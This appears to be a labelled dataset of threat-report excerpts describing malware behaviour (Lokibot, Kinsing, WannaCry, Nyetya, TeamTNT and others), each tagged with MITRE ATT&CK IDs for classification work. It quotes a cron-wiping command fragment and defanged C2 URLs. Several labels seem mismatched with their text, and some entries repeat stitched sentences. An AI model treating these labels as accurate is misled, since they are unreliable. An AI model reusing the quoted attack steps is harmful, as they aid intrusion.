{"text1":"Harvest cookies and a password database for supported browsers. Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale - Recursively search a path and upload file metadata (timestamps, size, and full path). - Spawn a thread to recursively search a path and upload files as a ZIP archive","labels":"['T1539']"}
{"text1":"A recent Lokibot campaign has been spotted, which made use of a tunneling service to spread the malware. According to My Online Security, threat actors behind this campaign leveraged a service known as Ngrok. As claimed on the website, Ngrok reveals servers in NATs and Firewalls over secure tunnels. Hence, the service acted as a direct tunnel or a VPN which the actors exploited to push the malware through spam emails","labels":"['T1572']"}
{"text1":"The script itself works as a downloader for additional files needed for loading the malware into the system, which are hosted separately as a ZIP package. We confirmed two different techniques used for distributing the Melcoz backdoor: the AutoIt loader script and DLL Hijack","labels":"['T1105']"}
{"text1":"The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications","labels":"['T1113']"}
{"text1":"5) Downloads the \u2018kinsing\u2019 malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '\/update.sh\/d' || crontab","labels":"['T1059.004', 'T1053.003']"}
{"text1":"Once on a victim\u2019s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex","labels":"['T1129']"}
{"text1":"The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10","labels":"['T1555.003']"}
{"text1":"Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization\u2019s email domain. If references are found, perform additional analysis to see if a data breach has occurred","labels":"['T1114.001']"}
{"text1":"Attack overview . Flagpro is used in the initial stage of attacks to investigate target\u2019s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as \u201cFlagpro v2.0\u201d and old one as \u201cFlagpro v1.0\u201d in this article. Once Flagpro is launched, it communicate with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has \u201cExecYes\u201d, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. Following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like following are also useful for detection","labels":"['T1069.001']"}
{"text1":"Figure 5 Uploading a file to server via RGDoor\u00a0Downloading a file from the server via RGDoor","labels":"['T1105']"}
{"text1":"If the configuration is parsed successfully, the program writes the string \"Meteor has started. to an encrypted log file, suggesting that the internal name of the malware is \u201cMeteor\u201c. As we will see later on in this article, another name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. Appendix C contains a helper script to decrypt the log file","labels":"['T1105']"}
{"text1":"Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company\u2019s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers","labels":"['T1005']"}
{"text1":"Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits \u2014 given their capability to overwrite or modify parts of the kernel \u2014 makes it harder to clean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up","labels":"['T1059.004']"}
{"text1":"During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. This modification to the system time was seen in the previous campaign, and the temporary license key within the wiper component is the exact same as wiper component from the 2012 attacks. The wiper itself queries the following registry keys to obtain a list of partitions to overwrite","labels":"['T1012']"}
{"text1":"Of note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon. Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2. Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block","labels":"['T1071.003']"}
{"text1":"If you use \/p, del displays the name of a file and sends the following message: FileName, Delete (Y\/N)? To confirm the deletion, press Y. To cancel the deletion and display the next file name (that is, if you specified a group of files), press N. For example, the following command deletes all of the files in the \\Work folder: Copy del \\work - You can use wildcards (* and ?) to delete more than one file at a time. However, to avoid deleting files unintentionally, you should use wildcards cautiously with the del command. For example, if you type the following command: Copy del *.* The del command displays the following prompt: Are you sure (Y\/N)? To delete all of the files in the current directory, press Y and then press ENTER. To cancel the deletion, press N and then press ENTER","labels":"['T1070.004']"}
{"text1":"To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor","labels":"['T1003.001']"}
{"text1":"Win32\/Diskcoder.D has the ability to spread via SMB. First, it scans internal networks for open SMB shares. It looks for the following shares","labels":"['T1135']"}
{"text1":"In January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program","labels":"['T1070.004']"}
{"text1":"HttpBrowser is a remote access tool whose name originates from the hard-coded \"HttpBrowser\/1.0\" User-Agent. Table 2 lists the commands available to threat actors in one of the HttpBrowser variants","labels":"['T1083']"}
{"text1":"When the malicious RTF document is opened, two things happen that allow the attacker malware to run. First, the \"packager trick\" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory","labels":"['T1204.002']"}
{"text1":"It uses two components to avoid detection by a single component. The dropper uses an old trick in a new way: It appends the RAT to a Word document. Upon opening the document, a macro is executed that will extract the malware and execute it","labels":"['T1059.005']"}
{"text1":"Finally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using\u00a0Set-CASMailbox","labels":"['T1098.005', 'T1098.002']"}
{"text1":"SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence","labels":"['T1566.001']"}
{"text1":"1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists","labels":"['T1083']"}
{"text1":"1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http:\/\/185.203.119[.]184\/Dropbox\/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http:\/\/185.203.119[.]184\/Dropbox\/request","labels":"['T1070.004']"}
{"text1":"The dropped file is executed after terminating any process with the same name. For persistence, it adds a shortcut for the file at the %STARTUP% directory","labels":"['T1547.001']"}
{"text1":"The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern","labels":"['T1020']"}
{"text1":"Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware","labels":"['T1057', 'T1543.003', 'T1119']"}
{"text1":"Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches","labels":"['T1204.002']"}
{"text1":"After the files are encrypted the program will write a ransom note to each folder and directory on the system called read_me_unlock.txt","labels":"['T1047']"}
{"text1":"In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Cobalt Strike provides the ability to use the Artifact Kit framework for these purposes and even modify it, as it is distributed in the source code. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1059.001']"}
{"text1":"The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system. Notably, after the first SMB packet sent to the victim\u2019s IP address, the malware sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5","labels":"['T1563.002']"}
{"text1":"The file \/tmp\/.rOuYXzdOF was most likely used as a mutex, ensuring only one copy of Netwire could run at a time. Next, .default.conf was a configuration file storing data required for Netwire to communicate with command and control. On the Windows side, this is usually stored in the Registry","labels":"['T1112']"}
{"text1":"This time, the text is from the novel \"The Brothers Karamazov\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. For example, the variables are stored in a \"Constant.py\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files","labels":"['T1071.001']"}
{"text1":"The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name","labels":"['T1132.001']"}
{"text1":"The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named \u201cAnnual Bonus Report.doc\u201d. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet","labels":"['T1204.002', 'T1566.002']"}
{"text1":"Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019","labels":"['T1137.006']"}
{"text1":"One of the discovered MarkiRAT variants was used to intercept the execution of Telegram and launch the malware along with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of functions in charge of the malware\u2019s deployment on the victim machine","labels":"['T1518.001']"}
{"text1":"This behavior is detailed later in the blog under \"Malware Functionality\". Unlike WannaCry, Nyetya does not appear to contain an external scanning component. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. For example: The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts: - The attacker modified the command codes: - The attacker modified the response codes: - The attacker modified where the response code is stored in the SMB response packet. PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the \"Recovery of User Credentials\" section above) to install the malware on the networked device. WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the \"Recovery of User Credentials\" section above","labels":"['T1003.001']"}
{"text1":"For persistence and remote control, the script downloads another base64-encoded Python script from hxxps:\/\/ptpb[.]pw\/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture","labels":"['T1059.006']"}
{"text1":"When required by the attacker, it is capable of remotely activating the microphone on the compromised computer and capturing sounds. The audio recordings are encoded to MP3 format using a legitimate lame.dll library, which is downloaded and misused by the malware","labels":"['T1123']"}
{"text1":"2022\u201301\u201315, MSTIC (Microsoft Threat Intelligence Center) identified and unveiled a cyberattack targeting Ukrainian organizations with \u201cWhisperGate\u201d overwrites Master Boot Record(MBR) and files","labels":"['T1561.002']"}
{"text1":"The AppleSeed payload has an export function named \u201cDllRegisterServer\u201d which will be called when the DLL is executed using RegSvr32.exe. DllRegisterServer has a function that is responsible for performing the DLL initialization and setup that includes the following steps","labels":"['T1059.007', 'T1059.001']"}
{"text1":"Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries","labels":"['T1598.003']"}
{"text1":"Manage the use of privileged accounts. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions. Disable or limit remote WMI and file sharing. Block remote execution through PSEXEC. Segregate networks and functions. Harden network devices and secure access to infrastructure devices. Perform out-of-band network management. Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices","labels":"['T1021.002']"}
{"text1":"The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process","labels":"['T1055.001', 'T1057']"}
{"text1":"Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server","labels":"['T1105']"}
{"text1":"The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server. However, we were unable to obtain any sample of the subsequent payloads for this malware","labels":"['T1105']"}
{"text1":"Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following","labels":"['T1071.004', 'T1008']"}
{"text1":"Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Stage 4 \u2014 Downloaders . PowerShell leading to shellcode . The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. JScript downloader . As opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. The commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. Interestingly, if an attack used version 4.4, the attackers decided to add a variable \"researchers\" initialized to the string \"We are not cobalt gang, stop associating us with such skids. Cobalt Strike beacon . On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors","labels":"['T1059.001']"}
{"text1":"DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features","labels":"['T1518.001']"}
{"text1":"The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \u201c[username]=>singleton-instance-mutex\u201d. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string \u201cGlobal\\\\\u201d to create the mutex","labels":"['T1087.001', 'T1082']"}
{"text1":"Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto\u00a0researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT","labels":"['T1518.001']"}
{"text1":"As mentioned by the Cisco Talos Intelligence Group, after executing the Micropsia registers itself against the C2 server","labels":"['T1082']"}
{"text1":"The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the \"Paths\" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration","labels":"['T1119']"}
{"text1":"At line 40, that data is piped through the base64 utility for decoding, dropped in a subfolder in the \/tmp directory, given executable permissions via chmod, and then launched as the 2nd stage payload","labels":"['T1222.002']"}
{"text1":"Sodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile attacks since April 2019","labels":"['T1204.002']"}
{"text1":"PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs","labels":"['T1555.004']"}
{"text1":"After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution","labels":"['T1059.003']"}
{"text1":"Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username","labels":"['T1047', 'T1082', 'T1016']"}
{"text1":"Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. The backchannel URL addresses have been changed by the Dynamic DNS sites to resolve to a loopback address (127.0.0.2). This in effect severs the connection to the control servers. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the \u201cattack surface\u201d by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack","labels":"['T1016']"}
{"text1":"One of the most noticeable differences is the use of encryption over the entire TCP segment, as a way for it to evade detection. Additionally, this seems to be a lightweight version of Gh0stRAT, as it only has 12 commands, compared to the 73 for a full Gh0stRAT sample; 3 of those commands are undocumented. Also, unlike most samples that I receive on my honeypot, this sample did not start as a DLL that communicates to a distribution server in order to download the stage1","labels":"['T1573', 'T1095']"}
{"text1":"The attackers gain an initial foothold on targeted machines via phishing emails containing malicious attachments. The emails are often industry-specific and crafted to entice a victim to open the message and execute the attached document","labels":"['T1566.001']"}
{"text1":"The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access","labels":"['T1078', 'T1219']"}
{"text1":"A loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task","labels":"['T1053.005']"}
{"text1":"The name EvilBunny is derived from debug information embedded in the malware\u2019s dropper. Furthermore, the specified piece incorporates a Lua 5.1 interpreter, which allows the malware to execute Lua scripts and change its behavior at runtime. The dropper will place the EvilBunny malware under %APPDATA%\\Perf Manager\\ or %WINDIR%\\msapps\\; depending whether the dropper is running with administrative privileges or not. Also, the malware will generate numerous files to help its execution and frequently reply back to the C&C with status messages. Similar to its dropper, the binary seeks to evade sandboxes. Next to that, the main thread also runs sub threads to maintain log files the malware creates during execution and to keep track of the overall system load the malware creates. The worker threads are internally dubbed \u2018hearer\u2019, which is believed to stand for \u2018listener\u2019. It can be concluded thereafter that the malware authors were no English native speakers. The main action of the malware is carried out in the main thread, which parses commands and executes Lua scripts, provided by the worker threads via command files. Each hearer has a dedicated method to receive instructions which is either separately via HTTP from the server, aggregated through a downloaded data file or as tasks to be configured as scheduled tasks. In general this is a rather uncommon technique, but it has been observed before, especially in connection with some adware variants","labels":"['T1497.001']"}
{"text1":"The malware continues by creating a service named\u00a0mssecsvc2.0\u00a0with a binary path pointing to the running module with the arguments \"-m security\". Once created, the malware starts the service","labels":"['T1543.003']"}
{"text1":"Sends phishing mail to given recipients and receives user\u2019s access token using device code authentication flow","labels":"['T1528']"}
{"text1":"First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message (\"Payment: Find scheduled payment dates attached\"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the \"Templates\" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\\Windows\\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload","labels":"['T1053']"}
{"text1":"Find out all system information, including hardware being used and the exact version of your operating system, including security patches. Steal from your clipboard (things you\u2019ve copied) - Control your printer - Lock\/Restart\/Shutdown your computer - Update the implant with a new address to beacon to or new functionality","labels":"['T1082']"}
{"text1":"This step establishes the persistence of the malware across reboots on the endpoint - Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint","labels":"['T1547.001']"}
{"text1":"Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK","labels":"['T1071']"}
{"text1":"They include registry, file system manipulations, and searching files with specific patterns, and retrieving and transferring them back to the server and gathering network status information","labels":"['T1083']"}
{"text1":"OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what. hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit","labels":"['T1071.001']"}
{"text1":"The encrypted file names are appended with a string of random characters as the new extension. For example, it renames a file named \u201cMy_files.zip\u201d to \u201cMy_files.zip.IAsnM\u201d, \u201cMy_files2.zip\u201d to \u201cMy_files2.zip.WZlF\u201d and so on. Also, the threat actor creates the \u201cRECOVER-FILES.txt\u201d with ransom note in all folders that contain encrypted files, as shown in the figure below","labels":"['T1486']"}
{"text1":"Task 0x1: react_exec The react_exec command appears to execute a payload received from the server. Interestingly it attempts to first execute the payload directly from memory. Specifically it invokes a function named ei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory, NSLinkModule, NSLookupSymbolInModule, and NSAddressOfSymbol APIs to load and link the in-memory payload. In some cases the file will be set to executable via a call to chmod. Specifically it instructs the malware to spawn a background thread to execute a function named eilf_rglk_watch_routine. This function creates an event tap (via the CGEventTapCreate API), add it to the current runloop, then invokes the CGEventTapEnable to activate the event tap","labels":"['T1106']"}
{"text1":"Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers","labels":"['T1016']"}
{"text1":"Talos has identified at least three different campaigns since July 2019. It is interesting to note that this threat actor uses HTTPS on the C2. They always use self-signed certificates","labels":"['T1587.003']"}
{"text1":"The malware will then write a base64 encoded PowerShell script (which is contained in xmlparse.dll as a resource) to \\%TEMP%\\enu1.ps1 and execute it. The script, intended for reconnaissance purposes, checks if a machine is part of a domain and if the user has Admin privileges or is part of the Admin Group","labels":"['T1059.001']"}
{"text1":"The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings","labels":"['T1059.001', 'T1614.001']"}
{"text1":"Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file","labels":"['T1548.002']"}
{"text1":"For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee\u2019s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications","labels":"['T1036']"}
{"text1":"Additionally, each beacon is accompanied with a screenshot that is initially saved as \u2018scr.jpg\u2019 in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the \u2018uploadsf\u2019 command","labels":"['T1113']"}
{"text1":"The TajMahal framework is an intriguing discovery that\u2019s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc","labels":"['T1083', 'T1119', 'T1041']"}
{"text1":"Analysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings","labels":"['T1132.001']"}
